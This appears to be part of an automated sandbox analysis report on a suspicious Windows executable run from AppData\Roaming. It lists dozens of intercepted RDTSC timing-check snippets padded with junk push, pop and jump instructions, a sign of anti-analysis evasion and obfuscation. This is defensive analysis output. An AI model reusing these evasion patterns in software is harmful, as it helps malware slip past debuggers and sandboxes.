Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D21EB6 second address: D21EC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D21EC1 second address: D21EC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D21EC5 second address: D21EDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D21EDC second address: D21EE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D222FA second address: D2231F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A58h 0x00000007 ja 00007F0E94F51A46h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D2231F second address: D22327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D22327 second address: D2232C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D2232C second address: D22343 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F0E948C9FB6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jbe 00007F0E948C9FB6h 0x00000011 push eax 0x00000012 pop eax 0x00000013 popad 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D22677 second address: D2267C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D2267C second address: D22682 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D22682 second address: D2268C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0E94F51A46h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D22818 second address: D2284F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0E948C9FB6h 0x00000008 jmp 00007F0E948C9FC2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnc 00007F0E948C9FC2h 0x00000015 jmp 00007F0E948C9FBAh 0x0000001a push edi 0x0000001b pop edi 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D2284F second address: D22863 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jc 00007F0E94F51A46h 0x0000000d jg 00007F0E94F51A46h 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D26DF3 second address: D26E07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jg 00007F0E948C9FB6h 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F0E948C9FB6h 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C44F34 second address: C44F3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C44F3A second address: C44F48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F0E948C9FB6h 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C44F48 second address: C44F4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C44F4C second address: C44F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D26962 second address: D26970 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F0E94F51A48h 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D26970 second address: D26983 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnl 00007F0E948C9FB6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D26983 second address: D26989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D26989 second address: D2698E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D2698E second address: D26994 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D26B10 second address: D26B2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F0E948C9FC4h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D26B2D second address: D26B33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D26B33 second address: D26B37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D26B37 second address: D26B4F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0E94F51A46h 0x00000008 jbe 00007F0E94F51A46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jne 00007F0E94F51A46h 0x00000018 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D31F09 second address: D31F0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D31F0D second address: D31F11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D45E15 second address: D45E36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E948C9FC4h 0x00000009 pushad 0x0000000a popad 0x0000000b jp 00007F0E948C9FB6h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D45E36 second address: D45E49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D45CAC second address: D45CB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D61915 second address: D6191A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D6191A second address: D61937 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E948C9FC3h 0x00000009 jnl 00007F0E948C9FB6h 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D61937 second address: D6193B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D6193B second address: D61941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D606E0 second address: D606E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D60A28 second address: D60A2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D60A2E second address: D60A5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0E94F51A4Ah 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F0E94F51A55h 0x00000012 pop edi 0x00000013 pushad 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D60A5B second address: D60A74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E948C9FBFh 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D60D3A second address: D60D4A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jns 00007F0E94F51A46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D60D4A second address: D60D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E948C9FC8h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D60D66 second address: D60D70 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D611C6 second address: D611CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D611CC second address: D611D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D611D7 second address: D611DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D63036 second address: D6303A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D688B1 second address: D688D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jnp 00007F0E948C9FC7h 0x0000000e jmp 00007F0E948C9FC1h 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D6896E second address: D68985 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jbe 00007F0E94F51A46h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D68985 second address: D689F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E948C9FC2h 0x00000009 popad 0x0000000a popad 0x0000000b nop 0x0000000c and edx, dword ptr [ebp+122D1C73h] 0x00000012 push 00000004h 0x00000014 jne 00007F0E948C9FC6h 0x0000001a call 00007F0E948C9FB9h 0x0000001f jmp 00007F0E948C9FBEh 0x00000024 push eax 0x00000025 jmp 00007F0E948C9FC6h 0x0000002a mov eax, dword ptr [esp+04h] 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 jne 00007F0E948C9FB6h 0x00000037 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D689F7 second address: D68A0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jg 00007F0E94F51A46h 0x0000000f popad 0x00000010 popad 0x00000011 mov eax, dword ptr [eax] 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D68A0F second address: D68A13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D68CA3 second address: D68CC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A55h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D68CC3 second address: D68CC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D68CC7 second address: D68CCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: D6C086 second address: D6C08E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4EA0EFC second address: 4EA0F00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4EA0F00 second address: 4EA0F06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E4016C second address: 4E4017C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E94F51A4Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E4017C second address: 4E4019F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F0E948C9FC4h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E60B5D second address: 4E60B63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E60B63 second address: 4E60B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E60B67 second address: 4E60B6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E60B6B second address: 4E60B9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a call 00007F0E948C9FC2h 0x0000000f pop edi 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F0E948C9FC3h 0x00000019 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E60B9F second address: 4E60BC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E60BC4 second address: 4E60BD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FBFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E60BD7 second address: 4E60BFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov dh, 72h 0x0000000f mov edi, esi 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E6076F second address: 4E6077E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E60676 second address: 4E6068C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A52h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E6068C second address: 4E606D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 mov edx, 397F1680h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esp 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F0E948C9FC2h 0x00000015 xor si, 34C8h 0x0000001a jmp 00007F0E948C9FBBh 0x0000001f popfd 0x00000020 popad 0x00000021 mov dword ptr [esp], ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov di, si 0x0000002a jmp 00007F0E948C9FBAh 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E6046C second address: 4E604A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0E94F51A55h 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E604A0 second address: 4E604A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E604A6 second address: 4E604C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E604C5 second address: 4E604C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E70121 second address: 4E70125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E70125 second address: 4E70142 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E70142 second address: 4E70163 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0E94F51A52h 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E70163 second address: 4E7017A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E7017A second address: 4E7017E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E7017E second address: 4E70182 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E70182 second address: 4E70188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4EA0DEF second address: 4EA0E34 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F0E948C9FC8h 0x00000008 add ch, 00000028h 0x0000000b jmp 00007F0E948C9FBBh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 call 00007F0E948C9FC6h 0x0000001a pop ecx 0x0000001b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4EA0E34 second address: 4EA0E8A instructions: 0x00000000 rdtsc 0x00000002 mov ax, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007F0E94F51A4Ch 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F0E94F51A50h 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F0E94F51A4Dh 0x0000001f and si, AE56h 0x00000024 jmp 00007F0E94F51A51h 0x00000029 popfd 0x0000002a mov eax, 4261EBC7h 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E801FC second address: 4E8025B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F0E948C9FC1h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov cx, dx 0x00000016 pushfd 0x00000017 jmp 00007F0E948C9FBFh 0x0000001c xor eax, 71CF5DBEh 0x00000022 jmp 00007F0E948C9FC9h 0x00000027 popfd 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E8025B second address: 4E80260 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E80260 second address: 4E80294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F0E948C9FBDh 0x0000000a add si, E7F6h 0x0000000f jmp 00007F0E948C9FC1h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E80294 second address: 4E80298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E80298 second address: 4E8029E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
